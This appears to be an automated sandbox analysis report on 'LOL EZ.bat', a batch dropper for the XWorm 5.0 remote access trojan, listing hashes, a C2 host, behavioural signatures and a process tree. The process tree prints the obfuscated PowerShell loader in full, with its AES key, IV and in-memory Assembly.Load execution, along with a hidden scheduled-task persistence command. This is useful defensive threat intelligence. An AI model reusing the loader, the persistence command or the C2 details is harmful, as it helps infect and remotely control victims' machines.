Analysis
-
max time kernel
49s -
max time network
39s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250113-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
21-01-2025 22:46
Static task
static1
Behavioral task
behavioral1
Sample
LOL EZ.bat
Resource
win10ltsc2021-20250113-en
General
-
Target
LOL EZ.bat
-
Size
278KB
-
MD5
c7f70f6597b99690acab02390af9a913
-
SHA1
ec989e5b37d4d9bf56d9b330ed97826313ae3255
-
SHA256
f07d66adf106785f59920963b5c928dfd5a16774ab476f262135bc3c2cd58590
-
SHA512
991f4c36731dea73455da9a81185af01fb54cda915b5632edbc3f2251648745e47fd09b21d6548dcae170b1bfcf470b89f311cefc6733013be23667b31ae036b
-
SSDEEP
6144:3LDqmpofOLfpSCTvwLEbxm1/zGfAaWK6NY8M2PZaNSRw4ia:bDqmpofOLfh73KqltvChaivL
Malware Config
Extracted
xworm
5.0
real-enquiry.gl.at.ply.gg:15403
Twor9QJPgxqGUGz9
-
Install_directory
%Public%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/2352-94-0x000001A7F4CC0000-0x000001A7F4CD0000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 17 2352 powershell.exe 26 2352 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 384 powershell.exe 4132 powershell.exe 2352 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1898866115-3160784972-1217720036-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$phantomClient.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$phantomClient.lnk powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1898866115-3160784972-1217720036-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$phantomClient = "C:\\Users\\Public\\$phantomClient" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ip-api.com -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00188011E125D93F" svchost.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1898866115-3160784972-1217720036-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 384 powershell.exe 384 powershell.exe 4132 powershell.exe 4132 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe 2352 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 384 powershell.exe Token: SeDebugPrivilege 4132 powershell.exe Token: SeIncreaseQuotaPrivilege 4132 powershell.exe Token: SeSecurityPrivilege 4132 powershell.exe Token: SeTakeOwnershipPrivilege 4132 powershell.exe Token: SeLoadDriverPrivilege 4132 powershell.exe Token: SeSystemProfilePrivilege 4132 powershell.exe Token: SeSystemtimePrivilege 4132 powershell.exe Token: SeProfSingleProcessPrivilege 4132 powershell.exe Token: SeIncBasePriorityPrivilege 4132 powershell.exe Token: SeCreatePagefilePrivilege 4132 powershell.exe Token: SeBackupPrivilege 4132 powershell.exe Token: SeRestorePrivilege 4132 powershell.exe Token: SeShutdownPrivilege 4132 powershell.exe Token: SeDebugPrivilege 4132 powershell.exe Token: SeSystemEnvironmentPrivilege 4132 powershell.exe Token: SeRemoteShutdownPrivilege 4132 powershell.exe Token: SeUndockPrivilege 4132 powershell.exe Token: SeManageVolumePrivilege 4132 powershell.exe Token: 33 4132 powershell.exe Token: 34 4132 powershell.exe Token: 35 4132 powershell.exe Token: 36 4132 powershell.exe Token: SeIncreaseQuotaPrivilege 4132 powershell.exe Token: SeSecurityPrivilege 4132 powershell.exe Token: SeTakeOwnershipPrivilege 4132 powershell.exe Token: SeLoadDriverPrivilege 4132 powershell.exe Token: SeSystemProfilePrivilege 4132 powershell.exe Token: SeSystemtimePrivilege 4132 powershell.exe Token: SeProfSingleProcessPrivilege 4132 powershell.exe Token: SeIncBasePriorityPrivilege 4132 powershell.exe Token: SeCreatePagefilePrivilege 4132 powershell.exe Token: SeBackupPrivilege 4132 powershell.exe Token: SeRestorePrivilege 4132 powershell.exe Token: SeShutdownPrivilege 4132 powershell.exe Token: SeDebugPrivilege 4132 powershell.exe Token: SeSystemEnvironmentPrivilege 4132 powershell.exe Token: SeRemoteShutdownPrivilege 4132 powershell.exe Token: SeUndockPrivilege 4132 powershell.exe Token: SeManageVolumePrivilege 4132 powershell.exe Token: 33 4132 powershell.exe Token: 34 4132 powershell.exe Token: 35 4132 powershell.exe Token: 36 4132 powershell.exe Token: SeIncreaseQuotaPrivilege 4132 powershell.exe Token: SeSecurityPrivilege 4132 powershell.exe Token: SeTakeOwnershipPrivilege 4132 powershell.exe Token: SeLoadDriverPrivilege 4132 powershell.exe Token: SeSystemProfilePrivilege 4132 powershell.exe Token: SeSystemtimePrivilege 4132 powershell.exe Token: SeProfSingleProcessPrivilege 4132 powershell.exe Token: SeIncBasePriorityPrivilege 4132 powershell.exe Token: SeCreatePagefilePrivilege 4132 powershell.exe Token: SeBackupPrivilege 4132 powershell.exe Token: SeRestorePrivilege 4132 powershell.exe Token: SeShutdownPrivilege 4132 powershell.exe Token: SeDebugPrivilege 4132 powershell.exe Token: SeSystemEnvironmentPrivilege 4132 powershell.exe Token: SeRemoteShutdownPrivilege 4132 powershell.exe Token: SeUndockPrivilege 4132 powershell.exe Token: SeManageVolumePrivilege 4132 powershell.exe Token: 33 4132 powershell.exe Token: 34 4132 powershell.exe Token: 35 4132 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3208 wrote to memory of 3752 3208 cmd.exe 82 PID 3208 wrote to memory of 3752 3208 cmd.exe 82 PID 3752 wrote to memory of 660 3752 net.exe 83 PID 3752 wrote to memory of 660 3752 net.exe 83 PID 3208 wrote to memory of 4964 3208 cmd.exe 85 PID 3208 wrote to memory of 4964 3208 cmd.exe 85 PID 3208 wrote to memory of 384 3208 cmd.exe 86 PID 3208 wrote to memory of 384 3208 cmd.exe 86 PID 384 wrote to memory of 4132 384 powershell.exe 89 PID 384 wrote to memory of 4132 384 powershell.exe 89 PID 384 wrote to memory of 3912 384 powershell.exe 93 PID 384 wrote to memory of 3912 384 powershell.exe 93 PID 3912 wrote to memory of 1760 3912 WScript.exe 94 PID 3912 wrote to memory of 1760 3912 WScript.exe 94 PID 1760 wrote to memory of 2396 1760 cmd.exe 96 PID 1760 wrote to memory of 2396 1760 cmd.exe 96 PID 2396 wrote to memory of 3172 2396 net.exe 97 PID 2396 wrote to memory of 3172 2396 net.exe 97 PID 1760 wrote to memory of 692 1760 cmd.exe 98 PID 1760 wrote to memory of 692 1760 cmd.exe 98 PID 1760 wrote to memory of 2352 1760 cmd.exe 99 PID 1760 wrote to memory of 2352 1760 cmd.exe 99 PID 2352 wrote to memory of 3720 2352 powershell.exe 57 PID 2352 wrote to memory of 1968 2352 powershell.exe 33 PID 2352 wrote to memory of 1572 2352 powershell.exe 27 PID 2352 wrote to memory of 976 2352 powershell.exe 12 PID 2352 wrote to memory of 1368 2352 powershell.exe 23 PID 2352 wrote to memory of 1564 2352 powershell.exe 26 PID 2352 wrote to memory of 3336 2352 powershell.exe 67 PID 2352 wrote to memory of 2152 2352 powershell.exe 38 PID 2352 wrote to memory of 2544 2352 powershell.exe 42 PID 2352 wrote to memory of 2332 2352 powershell.exe 41 PID 2352 wrote to memory of 1344 2352 powershell.exe 22 PID 2352 wrote to memory of 944 2352 powershell.exe 36 PID 2352 wrote to memory of 3608 2352 powershell.exe 56 PID 2352 wrote to memory of 1720 2352 powershell.exe 30 PID 2352 wrote to memory of 928 2352 powershell.exe 11 PID 2352 wrote to memory of 1116 2352 powershell.exe 18 PID 2352 wrote to memory of 2100 2352 powershell.exe 37 PID 2352 wrote to memory of 2296 2352 powershell.exe 40 PID 2352 wrote to memory of 3280 2352 powershell.exe 55 PID 2352 wrote to memory of 2488 2352 powershell.exe 71 PID 2352 wrote to memory of 708 2352 powershell.exe 15 PID 2352 wrote to memory of 2860 2352 powershell.exe 49 PID 2352 wrote to memory of 3844 2352 powershell.exe 58 PID 2352 wrote to memory of 1276 2352 powershell.exe 21 PID 2352 wrote to memory of 4228 2352 powershell.exe 74 PID 2352 wrote to memory of 2844 2352 powershell.exe 47 PID 2352 wrote to memory of 2032 2352 powershell.exe 35 PID 2352 wrote to memory of 2632 2352 powershell.exe 44 PID 2352 wrote to memory of 3024 2352 powershell.exe 53 PID 2352 wrote to memory of 1644 2352 powershell.exe 29 PID 2352 wrote to memory of 4992 2352 powershell.exe 66 PID 2352 wrote to memory of 460 2352 powershell.exe 13 PID 2352 wrote to memory of 2624 2352 powershell.exe 43 PID 2352 wrote to memory of 1832 2352 powershell.exe 32 PID 2352 wrote to memory of 1828 2352 powershell.exe 91 PID 2352 wrote to memory of 2024 2352 powershell.exe 34 PID 2352 wrote to memory of 1432 2352 powershell.exe 25 PID 2352 wrote to memory of 444 2352 powershell.exe 14 PID 2352 wrote to memory of 1624 2352 powershell.exe 28 PID 2352 wrote to memory of 1820 2352 powershell.exe 31 PID 2352 wrote to memory of 1028 2352 powershell.exe 16 PID 2352 wrote to memory of 1412 2352 powershell.exe 24
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵PID:820
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding2⤵PID:4860
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵PID:2008
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:928
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:976
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:460
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1212
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1276
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1412
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1432
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1624
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1644
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1820
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1968
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2024
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2100
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2152
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2296
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2332
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2624
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2768
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2844
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2852
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3024
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3608
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3720
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\LOL EZ.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3208 -
C:\Windows\system32\net.exenet file3⤵
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file4⤵PID:660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a6/Dz0sQgg0AXxVY9QgYlHPhkoWXKtsBNvv5q5mWBz0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XHnjn+k0TpEqrCKjUcNHHQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpFJb=New-Object System.IO.MemoryStream(,$param_var); $aolNn=New-Object System.IO.MemoryStream; $iXSFF=New-Object System.IO.Compression.GZipStream($HpFJb, [IO.Compression.CompressionMode]::Decompress); $iXSFF.CopyTo($aolNn); $iXSFF.Dispose(); $HpFJb.Dispose(); $aolNn.Dispose(); $aolNn.ToArray();}function execute_function($param_var,$param2_var){ $joNGZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XpYvB=$joNGZ.EntryPoint; $XpYvB.Invoke($null, $param2_var);}$DxRwH = 'C:\Users\Admin\AppData\Local\Temp\LOL EZ.bat';$host.UI.RawUI.WindowTitle = $DxRwH;$NGRKp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DxRwH).Split([Environment]::NewLine);foreach ($lDbVo in $NGRKp) { if ($lDbVo.StartsWith('aTooeqEeiEcbowJqPEvQ')) { $AbfNn=$lDbVo.Substring(20); break; }}$payloads_var=[string[]]$AbfNn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:4964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:384 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_94_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_94.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4132
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_94.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_94.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\system32\net.exenet file6⤵
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file7⤵PID:3172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a6/Dz0sQgg0AXxVY9QgYlHPhkoWXKtsBNvv5q5mWBz0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XHnjn+k0TpEqrCKjUcNHHQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpFJb=New-Object System.IO.MemoryStream(,$param_var); $aolNn=New-Object System.IO.MemoryStream; $iXSFF=New-Object System.IO.Compression.GZipStream($HpFJb, [IO.Compression.CompressionMode]::Decompress); $iXSFF.CopyTo($aolNn); $iXSFF.Dispose(); $HpFJb.Dispose(); $aolNn.Dispose(); $aolNn.ToArray();}function execute_function($param_var,$param2_var){ $joNGZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XpYvB=$joNGZ.EntryPoint; $XpYvB.Invoke($null, $param2_var);}$DxRwH = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_94.bat';$host.UI.RawUI.WindowTitle = $DxRwH;$NGRKp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DxRwH).Split([Environment]::NewLine);foreach ($lDbVo in $NGRKp) { if ($lDbVo.StartsWith('aTooeqEeiEcbowJqPEvQ')) { $AbfNn=$lDbVo.Substring(20); break; }}$payloads_var=[string[]]$AbfNn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2352
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3844
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4992
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3336
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:2488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4228
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:1828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:2764
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
2KB
MD53ccf13786554a09feada0ddedbc8a646
SHA154d359350816173172d9a351b465207e4be88a8f
SHA256f436e158dc2fc703547bec5d5111f4a7d43b2b7bb02a16dbab812e48ce8e5ca9
SHA5126fb3d66ccc739b2a6d93b19af338b3b8cda9c3d431dc9343ccfb7c121fc7f4383aad7581e6e27f9bd482d40b970ab6a61a4365a8003a96b190a9e781b2ae91b3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
123B
MD53955a88a459d28ac972e585c4b9b9cb5
SHA14dce02dabf87ff5f76af08b762a5fb7d7bc3d58d
SHA25662c224ef38bd1714300c5551995a0a7046a98a853a20aea78240e285d814f239
SHA5124898eebfd35ff3ebabaae3674610aa6c67014b5cfc64de635d23df080a522721dabe004cdcf5bbf17c2313aaeb1726690a13f3f363122bce245af92dbbf4180e
-
Filesize
3KB
MD5c6086d02f8ce044f5fa07a98303dc7eb
SHA16116247e9d098b276b476c9f4c434f55d469129c
SHA2568901d9c9aea465da4ea7aa874610a90b8cf0a71eba0e321cf9675fceee0b54a0
SHA5121876d8fc1a8ac83aadb725100ea7a1791bd62d4d0edc1b78802e0bffe458f309a66dc97e1b9da60dd52b8cb80bf471ccb5f8480e6192c9eb2a13eac36462d27a
-
Filesize
3KB
MD539b9eb9d1a56bc1792c844c425bd1dec
SHA1db5a91082fa14eeb6550cbc994d34ebd95341df9
SHA256acade97e8a1d30477d0dc3fdfea70c2c617c369b56115ec708ed8a2cfdbc3692
SHA512255b1c1c456b20e6e3415540ef8af58e723f965d1fa782da44a6bbc81b43d8a31c5681777ba885f91ed2dae480bc2a4023e01fe2986857b13323f0459520eb51
-
Filesize
2KB
MD54ac1741ceb19f5a983079b2c5f344f5d
SHA1f1ebd93fbade2e035cd59e970787b8042cdd0f3b
SHA2567df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc
SHA512583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd
-
Filesize
2KB
MD5a9124c4c97cba8a07a8204fac1696c8e
SHA11f27d80280e03762c7b16781608786f5a98ff434
SHA2568ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21
SHA512537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392